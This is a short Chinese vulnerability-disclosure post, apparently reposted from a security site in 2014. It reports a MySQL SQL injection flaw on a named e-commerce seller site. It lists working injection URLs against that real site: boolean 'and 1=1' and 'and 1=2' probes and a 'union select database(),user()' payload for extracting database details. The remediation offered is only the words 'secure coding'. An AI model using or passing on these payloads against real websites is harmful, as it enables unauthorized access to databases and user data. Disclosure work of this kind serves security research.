易唐网卖家网站SQL注入下载

来源：黑吧安全网　浏览：637次　时间：2014-06-12

做网站找雨过天晴工作室

易唐网卖家网站SQL注入电子商务网站易唐网卖家网站存在SQL注入漏洞

比较典型的Mysql数据库SQL注入，

http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=1--



http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2--

页面显示不同

http://www.tradetang.com.cn/view.php?act=notice&tp=notice&id=73 and 1=2 union%20select%20database(),user()--

修复方案：

安全编码

上一篇： [公开漏洞]人人网某分站SQL注入漏洞
下一篇： [公开漏洞]新华社某分社信息录入系统与短信系统文件遍历与注入导致大量用户手机泄露